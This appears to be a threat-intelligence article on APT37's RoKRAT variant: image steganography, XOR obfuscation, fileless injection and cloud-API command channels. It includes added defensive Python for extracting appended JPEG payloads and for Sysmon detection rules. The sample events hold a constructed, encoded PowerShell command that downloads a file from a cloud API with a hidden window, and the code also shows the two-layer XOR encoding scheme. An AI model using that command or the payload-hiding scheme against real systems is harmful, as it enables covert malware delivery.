- Malware is concealed in harmless-looking images so that it goes undetected.
- Legitimate cloud storage APIs are abused as covert command-and-control channels.
- Crypto platforms face credential theft and unauthorized mining.
The North Korean APT37 group has deployed a new variant of its RoKRAT malware that uses advanced evasion tactics to stay hidden. Its stealthy approach embeds malicious code within image files (steganography), which lets it slip past traditional signature-based security tools.
(Image source: genians.co.kr)
RoKRAT executes without writing its payload to disk. It injects malicious code into legitimate Windows programs such as mspaint.exe and notepad.exe and runs that code in memory, which sidesteps file-based antivirus scanning.
The malware also abuses the cloud storage services Dropbox, Yandex and pCloud: the attackers use these environments as command-and-control (C2) channels.
Hidden Threats Inside Innocent Images
The malware's ingenuity lies in encapsulating its payload in innocuous-looking JPEG files. The image renders normally, but encrypted code rides along inside the file.
Two layers of XOR encryption further complicate analysis (an obfuscation rather than real cryptography, but enough to defeat static signatures). As soon as the malware is launched, it decodes this obscured code and runs it in memory.
Infection starts with malicious Windows shortcut (LNK) files delivered inside ZIP archives. When opened, the shortcut runs a hidden PowerShell command.
That command downloads the encrypted image carrying the malware from attacker-controlled cloud accounts. Because the download looks like an ordinary image fetched from a popular cloud service, most defenses let it through.
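As an added example (not code from Genians or from the malware itself), the Python below shows how a payload appended after a JPEG's End-Of-Image marker can be located by walking the image structure rather than string-searching for FF D9, and how a two-layer XOR wrapper is peeled off. The carrier image, the keys (INNER_KEY, OUTER_KEY) and the specific layering (single-byte XOR, then a repeating multi-byte XOR) are constructed for illustration; RoKRAT's real keys and layout are not given on this page and must be recovered from the loader.

```python
"""JPEG trailing-payload triage and two-layer XOR unwrapping (added example).

Everything below is constructed for illustration: the sample image, the
appended blob, the keys and the layering scheme. Not code from the Genians
report or from RoKRAT.
"""
import math
from collections import Counter
from typing import Optional

SOI = b"\xff\xd8"                                   # Start Of Image marker
EOI = b"\xff\xd9"                                   # End Of Image marker
SCAN_SKIP = {0x00} | set(range(0xD0, 0xD8))         # FF00 stuffing, FF D0-D7 restart markers
STANDALONE = {0x01} | set(range(0xD0, 0xD8))        # markers that carry no length field

INNER_KEY = 0x5A                                    # constructed single-byte key
OUTER_KEY = b"\xc3\x7e\x19"                         # constructed repeating key
PAYLOAD = b"MZ\x90\x00" + b"This program cannot be run in DOS mode.\r\n" + bytes(range(64))


def find_eoi(data: bytes) -> int:
    """Walk the JPEG segment structure and return the offset just past EOI.

    Searching for the first FF D9 breaks on files with an Exif thumbnail (it has
    its own EOI inside APP1); searching for the last FF D9 is defeated by an
    appended payload that happens to contain FF D9. Walking the segments is robust.
    """
    if not data.startswith(SOI):
        raise ValueError("not a JPEG: missing SOI")
    pos = 2
    while pos + 1 < len(data):
        if data[pos] != 0xFF:
            raise ValueError(f"expected marker at offset {pos}")
        marker = data[pos + 1]
        if marker == 0xD9:                          # EOI
            return pos + 2
        if marker in STANDALONE:
            pos += 2
            continue
        seg_len = int.from_bytes(data[pos + 2:pos + 4], "big")
        pos += 2 + seg_len
        if marker == 0xDA:                          # SOS: entropy-coded data follows
            while pos + 1 < len(data):
                if data[pos] == 0xFF and data[pos + 1] not in SCAN_SKIP:
                    break                           # a real marker (EOI or the next SOS)
                pos += 1
    raise ValueError("no EOI marker found")


def trailing_data(data: bytes) -> bytes:
    """Bytes after EOI. A clean JPEG has none; a carrier image has the payload here."""
    return data[find_eoi(data):]


def shannon_entropy(buf: bytes) -> float:
    if not buf:
        return 0.0
    n = len(buf)
    return -sum(c / n * math.log2(c / n) for c in Counter(buf).values())


def xor_repeating(buf: bytes, key: bytes) -> bytes:
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(buf))


def encode_two_layer(payload: bytes, inner_key: int, outer_key: bytes) -> bytes:
    """Constructed loader scheme: XOR with one byte, then with a repeating key."""
    return xor_repeating(xor_repeating(payload, bytes([inner_key])), outer_key)


def recover_inner_key(layer1: bytes, known_prefix: bytes = b"MZ") -> Optional[int]:
    """Brute-force the single-byte key with a known-plaintext check on the PE header."""
    for k in range(256):
        if xor_repeating(layer1[: len(known_prefix)], bytes([k])) == known_prefix:
            return k
    return None


def triage(image: bytes, outer_key: bytes) -> dict:
    """Extract the appended blob, peel the outer layer, recover and strip the inner one."""
    blob = trailing_data(image)
    layer1 = xor_repeating(blob, outer_key)
    key = recover_inner_key(layer1)
    payload = xor_repeating(layer1, bytes([key])) if key is not None else None
    return {
        "trailing_len": len(blob),
        "trailing_entropy": round(shannon_entropy(blob), 2),
        "inner_key": key,
        "payload": payload,
    }


def build_sample_jpeg(appended: bytes) -> bytes:
    """Minimal, structurally valid JPEG (constructed): APP0, SOS, scan data with
    FF00 stuffing and an RST0 marker, EOI, then whatever is appended."""
    app0 = b"\xff\xe0" + (16).to_bytes(2, "big") + b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
    sos = b"\xff\xda" + (8).to_bytes(2, "big") + b"\x01\x01\x00\x00\x3f\x00"
    scan = b"\x12\x34\xff\x00\x56\xff\xd0\x78\x9a"
    return SOI + app0 + sos + scan + EOI + appended


def demo() -> dict:
    carrier = build_sample_jpeg(encode_two_layer(PAYLOAD, INNER_KEY, OUTER_KEY))
    return triage(carrier, OUTER_KEY)


if __name__ == "__main__":
    print(demo())
```

Run it on a real carrier by reading the file into `triage()` with the outer key pulled from the loader; a large, high-entropy `trailing_len` on an image that otherwise renders fine is the indicator worth alerting on even before the keys are known.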
Cloud Storage as Secret Hubs
APT37 operates the malware remotely through ordinary cloud storage APIs. RoKRAT communicates with api.pcloud.com, cloud-api.yandex.net and api.dropboxapi.com to exfiltrate data and fetch instructions, so its traffic blends in with legitimate cloud operations.
The attackers keep persistent control of these cloud C2 accounts with access tokens and disposable email accounts.
This keeps the malware resilient and stealthy. Because it connects only to real, widely used cloud services, domain- or IP-based blocklists are of little help; defenders have to look at which process is making the connection rather than at the destination.
Fileless Attack Increases Stealth
RoKRAT's fileless nature is a major challenge. Its forensic footprint is small because it injects code into legitimate Windows processes instead of writing files to disk.
Security teams should monitor for abnormal behaviour in system processes and for suspicious outbound cloud traffic, in particular connections to cloud storage APIs from processes such as mspaint.exe and notepad.exe that have no reason to make them. Endpoint Detection and Response (EDR) tools can surface this kind of activity. Early detection is the best defense against such advanced persistent threats.
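The monitoring advice above can be turned into concrete rules. The Python below is an added example, not a rule from Genians or any vendor: it runs three checks over constructed Sysmon-style process-creation (EventID 1) and network-connection (EventID 3) records, decoding any -EncodedCommand argument so the cloud API hostnames can be matched inside it. The field names follow Sysmon, but the dict layout and the sample events are assumptions about how a log pipeline would normalise them.

```python
"""Detection rules for the behaviours described above (added example, constructed
events). Not a vendor rule set; field layout is an assumption about your pipeline."""
import base64
import re

CLOUD_API_HOSTS = {"api.pcloud.com", "cloud-api.yandex.net", "api.dropboxapi.com"}
INJECTION_TARGETS = {"mspaint.exe", "notepad.exe"}     # decoy processes named in the report
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe"}

ENC_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
HIDDEN_RE = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline: str):
    """PowerShell -EncodedCommand is base64 of UTF-16LE text; return it or None."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def rule_lnk_powershell(ev):
    """PowerShell started by explorer.exe (how a double-clicked LNK launches it)
    with a hidden window or an encoded command; report any cloud API host inside."""
    if ev["EventID"] != 1 or basename(ev["Image"]) not in SCRIPT_HOSTS:
        return None
    if basename(ev.get("ParentImage", "")) != "explorer.exe":
        return None
    cmd = ev.get("CommandLine", "")
    decoded = decode_encoded_command(cmd)
    hidden = HIDDEN_RE.search(cmd) is not None
    if not (hidden or decoded):
        return None
    hosts = [h for h in CLOUD_API_HOSTS if h in (decoded or cmd).lower()]
    return f"lnk_powershell: hidden={hidden} cloud_hosts={sorted(hosts)}"


def rule_injection_target_c2(ev):
    """A GUI utility with no business talking to a cloud storage API."""
    if ev["EventID"] != 3 or basename(ev["Image"]) not in INJECTION_TARGETS:
        return None
    host = ev.get("DestinationHostname", "").lower()
    if host in CLOUD_API_HOSTS:
        return f"injection_target_c2: {basename(ev['Image'])} -> {host}"
    return None


def rule_script_host_spawns_target(ev):
    """PowerShell starting mspaint/notepad: the usual prelude to injecting into it."""
    if ev["EventID"] != 1 or basename(ev["Image"]) not in INJECTION_TARGETS:
        return None
    parent = basename(ev.get("ParentImage", ""))
    if parent in SCRIPT_HOSTS:
        return f"script_host_spawns_target: {parent} -> {basename(ev['Image'])}"
    return None


RULES = (rule_lnk_powershell, rule_injection_target_c2, rule_script_host_spawns_target)


def evaluate(events):
    """Return (event_index, alert_text) for every rule hit."""
    alerts = []
    for i, ev in enumerate(events):
        for rule in RULES:
            hit = rule(ev)
            if hit:
                alerts.append((i, hit))
    return alerts


# Constructed sample events. The script in event 0 is a made-up downloader, not RoKRAT's.
_SCRIPT = "$u='https://api.pcloud.com/getfilelink?fileid=1';iwr $u -OutFile $env:TEMP\\img.jpg"
_ENC = base64.b64encode(_SCRIPT.encode("utf-16-le")).decode()
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": PS, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": f"powershell.exe -nop -w hidden -enc {_ENC}"},
    {"EventID": 1, "Image": r"C:\Windows\System32\mspaint.exe", "ParentImage": PS,
     "CommandLine": "mspaint.exe"},
    {"EventID": 3, "Image": r"C:\Windows\System32\mspaint.exe",
     "DestinationHostname": "api.dropboxapi.com", "DestinationPort": 443},
    {"EventID": 3, "Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "DestinationHostname": "api.dropboxapi.com", "DestinationPort": 443},   # legit use, no alert
    {"EventID": 1, "Image": PS, "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "powershell.exe Get-Process"},                            # benign admin use
]

if __name__ == "__main__":
    for idx, text in evaluate(SAMPLE_EVENTS):
        print(idx, text)
```

The browser event deliberately produces no alert: blocking the cloud hosts outright would break legitimate users, so the rules key on the combination of process and destination, not the destination alone.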
Cryptocurrency Sector Under Threat
The malware is also a threat to the cryptocurrency sector. RoKRAT can steal crypto wallet keys and account credentials, and it runs cryptocurrency mining without the user's consent.
APT37 goes after individuals and companies that handle cryptocurrencies in cloud environments. Since many crypto platforms run on cloud infrastructure, the malware can drain assets without being noticed, posing grave financial risk to exchanges, wallets and custodians.
Security researchers and developers on blockchain projects are also on the attackers' radar; spear-phishing campaigns install RoKRAT on their systems to extract sensitive data and cryptocurrency.